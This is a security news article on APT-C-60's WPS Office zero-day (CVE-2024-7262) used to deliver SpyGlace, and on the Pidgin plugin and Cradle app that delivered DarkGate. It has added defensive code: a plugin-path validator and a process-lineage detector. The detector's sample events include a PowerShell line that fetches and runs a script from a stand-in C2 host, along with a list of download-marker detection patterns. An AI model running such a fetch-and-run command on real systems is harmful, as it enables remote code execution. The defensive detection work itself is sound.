A South Korea-aligned cyber espionage group has been linked to the zero-day exploitation of a now-patched critical remote code execution flaw in Kingsoft WPS Office to deploy a bespoke backdoor dubbed SpyGlace.
The activity has been attributed to a threat actor dubbed APT-C-60, according to cybersecurity firms ESET and DBAPPSecurity. The attacks have been found to infect Chinese and East Asian users with malware.
The security flaw in question is CVE-2024-7262 (CVSS score: 9.3), which stems from a lack of proper validation of user-provided file paths. This loophole essentially allows an adversary to upload an arbitrary Windows library and achieve remote code execution.
The bug “allows code execution via hijacking the control flow of the WPS Office plugin component promecefpluginhost.exe,” ESET said, adding it found another way to achieve the same effect. The second vulnerability is tracked as CVE-2024-7263 (CVSS score: 9.3).
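The root cause described above, a user-controlled file path that is not properly validated before a library is loaded, is a generic defect class, so the following added example (not WPS Office code, and not ESET's analysis) shows the weak pattern beside a hardened resolver. The plugin directory, the function names and the `.dll`-only rule are assumptions for the example; a real loader would additionally resolve symlinks and open the file by handle before loading it.

```python
"""
Illustrative plugin-library path validation (added example, not WPS Office code).

The flaw described in the article is a lack of proper validation of a
user-provided file path that lets an attacker get an arbitrary Windows
library loaded. weak_resolve() trusts the caller's string; safe_resolve()
only accepts a relative name that resolves to a .dll inside a fixed plugin
directory. Directory name and function names are assumptions.
"""
import posixpath
import re

# Constructed plugin directory; a real host would use its install location.
PLUGIN_DIR = "/opt/example-office/plugins"
ALLOWED_SUFFIXES = (".dll",)
# One path component: must start alphanumeric, so "." and ".." never pass.
COMPONENT_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


class UnsafePluginPath(ValueError):
    """Raised when a caller-supplied library path fails validation."""


def weak_resolve(user_path: str) -> str:
    """Weak pattern: hands the caller's string straight to the library loader.

    A UNC share, a drive-qualified path or a traversal sequence reaches the
    LoadLibrary-style call untouched, which is the defect class described.
    """
    return user_path


def safe_resolve(user_path: str) -> str:
    """Return the canonical path of a plugin library, or raise UnsafePluginPath.

    This validates the string only; a real loader would also resolve symlinks
    (realpath) and load from an already-opened handle.
    """
    if not user_path or "\x00" in user_path:
        raise UnsafePluginPath("empty path or embedded NUL")
    p = user_path.replace("\\", "/")           # treat both separators alike
    if p.startswith("//"):
        raise UnsafePluginPath("UNC / network path rejected")
    if re.match(r"^[A-Za-z]:", p):
        raise UnsafePluginPath("drive-qualified path rejected")
    if p.startswith("/"):
        raise UnsafePluginPath("absolute path rejected")
    parts = p.split("/")
    for part in parts:
        if not COMPONENT_RE.match(part):
            raise UnsafePluginPath(f"bad path component: {part!r}")
    # Defense in depth: normalise and confirm containment even though the
    # component check above already excluded '..' and empty segments.
    resolved = posixpath.normpath(posixpath.join(PLUGIN_DIR, *parts))
    if not resolved.startswith(PLUGIN_DIR + "/"):
        raise UnsafePluginPath("path escapes the plugin directory")
    # Windows file systems are case-insensitive, so compare the suffix lower-cased.
    if not resolved.lower().endswith(ALLOWED_SUFFIXES):
        raise UnsafePluginPath("only plugin libraries may be loaded")
    return resolved


def is_safe_plugin_path(user_path: str) -> bool:
    """Boolean convenience wrapper around safe_resolve()."""
    try:
        safe_resolve(user_path)
        return True
    except UnsafePluginPath:
        return False


if __name__ == "__main__":
    for candidate in ("spellcheck.dll", "sub/helper.dll",
                      "../../Windows/System32/other.dll",
                      "\\\\share\\payload.dll", "C:\\Users\\Public\\x.dll",
                      "helper.exe"):
        print(f"{candidate!r:40} weak={weak_resolve(candidate)!r:40} "
              f"safe={is_safe_plugin_path(candidate)}")
```

The point of the component allow-list is that rejecting `..`, absolute paths and UNC prefixes up front is cheaper and easier to audit than trying to normalise an arbitrary string afterwards; the containment check after `normpath` stays in place so that a future relaxation of the allow-list cannot silently reopen the traversal case.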
The attack conceived by APT-C-60 weaponizes the flaw into a one-click exploit that takes the form of a booby-trapped spreadsheet document that was uploaded to VirusTotal in February 2024.
Specifically, the file comes embedded with a malicious hyperlink that, when clicked, triggers a multi-stage infection sequence to deliver the SpyGlace trojan, a DLL file named TaskControler.dll that comes with file stealing, plugin loading, and command execution capabilities.
“The exploit developers embedded a picture of the spreadsheet’s rows and columns inside the spreadsheet in order to deceive and convince the user that the document is a regular spreadsheet,” security researcher Romain Dumont said. “The malicious hyperlink was linked to the image so that clicking on a cell in the picture would trigger the exploit.”
APT-C-60 is believed to have been active since 2021, with SpyGlace detected in the wild as far back as June 2022, according to Beijing-based cybersecurity vendor ThreatBook.
“Whether the group developed or bought the exploit for CVE-2024-7262, it definitely required some research into the internals of the application but also knowledge of how the Windows loading process behaves,” Dumont said.
“The exploit is cunning as it is deceptive enough to trick any user into clicking on a legitimate-looking spreadsheet while also being very effective and reliable. The choice of the MHTML file format allowed the attackers to turn a code execution vulnerability into a remote one.”
The disclosure comes as the Slovak cybersecurity company noted that a malicious third-party plugin for the Pidgin messaging application named ScreenShareOTR (or ss-otr) harbored code responsible for downloading next-stage binaries from a command-and-control (C&C) server, ultimately leading to the deployment of DarkGate malware.
“The functionality of the plugin, as advertised, includes screen sharing that uses the secure off-the-record messaging (OTR) protocol. However, in addition to that, the plugin contains malicious code,” ESET said. “Specifically, some versions of pidgin-screenshare.dll can download and execute a PowerShell script from the C&C server.”
The plugin, which also contains keylogger and screenshot capturing features, has since been removed from the third-party plugins list. Users who have installed the plugin are recommended to remove it with immediate effect.
ESET has since found that the same malicious backdoor code as ScreenShareOTR has also been uncovered in an app called Cradle (“cradle[.]im”) that purports to be an open-source fork of the Signal messaging app. The app has been available for download for nearly a year, since September 2023.
The malicious code is downloaded by running a PowerShell script, which then fetches and executes a compiled AutoIt script that ultimately installs DarkGate. The Linux flavor of Cradle delivers an ELF executable that downloads and executes shell commands and sends the results to a remote server.
Another common indicator is that both the plugin installer and the Cradle app are signed with a valid digital certificate issued to a Polish company called “INTERREX – SP. Z O.O.,” suggesting that the perpetrators are using different methods to spread malware.
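The infection chain described for ScreenShareOTR and Cradle (a messaging client whose plugin pulls and runs a PowerShell script, which in turn fetches and executes a compiled AutoIt script) leaves a process lineage that endpoint telemetry can catch regardless of whether the binaries carry a valid signature. The following added example (not ESET's detection logic) runs two such lineage rules over constructed process-creation events; the pipe-delimited event format, the sample command lines, the `cradle.exe` process name and the download markers are all assumptions.

```python
"""
Detection sketch for the plugin/Cradle chain described in the article:
a messaging client launching PowerShell that fetches a next stage, and that
PowerShell then launching an AutoIt interpreter. Added example, not ESET's
detection logic. Event format, sample events, the 'cradle.exe' process name
and the download markers are constructed assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List

MESSAGING_CLIENTS = {"pidgin.exe", "cradle.exe"}   # cradle.exe: assumed binary name
POWERSHELL = {"powershell.exe", "pwsh.exe"}
AUTOIT = {"autoit3.exe"}
# Command-line fragments that commonly indicate a fetch-and-run stage.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                    "invoke-expression", "iex", "-enc", "-encodedcommand",
                    "frombase64string")

# Constructed process-creation events: ts|pid|ppid|image|command line
SAMPLE_EVENTS = [
    "2024-08-01T10:00:00Z|900|1|C:\\Windows\\explorer.exe|explorer.exe",
    "2024-08-01T10:01:00Z|4100|900|C:\\Program Files\\Pidgin\\pidgin.exe|"
    "\"C:\\Program Files\\Pidgin\\pidgin.exe\"",
    "2024-08-01T10:01:05Z|4212|4100|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -w hidden -nop -c \"iwr http://c2.example.invalid/stage.ps1 | iex\"",
    "2024-08-01T10:01:09Z|4300|4212|C:\\Users\\Public\\AutoIt3.exe|"
    "AutoIt3.exe C:\\Users\\Public\\stage.a3x",
    # Benign: an admin's PowerShell under explorer.exe must not fire.
    "2024-08-01T10:02:00Z|5000|900|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -c Get-ChildItem C:\\Temp",
    # Benign: the messaging client opening a link in a browser must not fire.
    "2024-08-01T10:03:00Z|5100|4100|C:\\Program Files\\Mozilla Firefox\\firefox.exe|"
    "firefox.exe https://example.invalid/",
]


@dataclass
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        """Lower-cased image basename, tolerant of either path separator."""
        return self.image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(lines: List[str]) -> List[ProcEvent]:
    events = []
    for line in lines:
        # maxsplit=4 keeps any '|' inside the command line intact.
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(ts, int(pid), int(ppid), image, cmdline))
    return events


def detect(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Apply the two parent/child lineage rules and return one finding per hit."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        if e.name in POWERSHELL and parent.name in MESSAGING_CLIENTS:
            markers = [m for m in DOWNLOAD_MARKERS if m in e.cmdline.lower()]
            # A chat client spawning PowerShell at all is worth a look; download
            # markers in the command line raise it to high.
            findings.append({
                "rule": "messaging_client_spawned_powershell",
                "severity": "high" if markers else "medium",
                "pid": str(e.pid), "parent": parent.name,
                "detail": f"markers={markers}",
            })
        elif e.name in AUTOIT and parent.name in POWERSHELL:
            findings.append({
                "rule": "powershell_spawned_autoit",
                "severity": "high",
                "pid": str(e.pid), "parent": parent.name,
                "detail": e.cmdline,
            })
    return findings


def analyze(lines: List[str]) -> List[Dict[str, str]]:
    return detect(parse_events(lines))


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} pid={f['pid']} "
              f"parent={f['parent']} {f['detail']}")
```

Both rules key on process lineage rather than on file hashes or signer names, which matters here because the article notes the installer and the Cradle app carried a valid signature: a signature proves who signed a binary, not that the binary is benign, so a detection that whitelists signed code would have missed this chain.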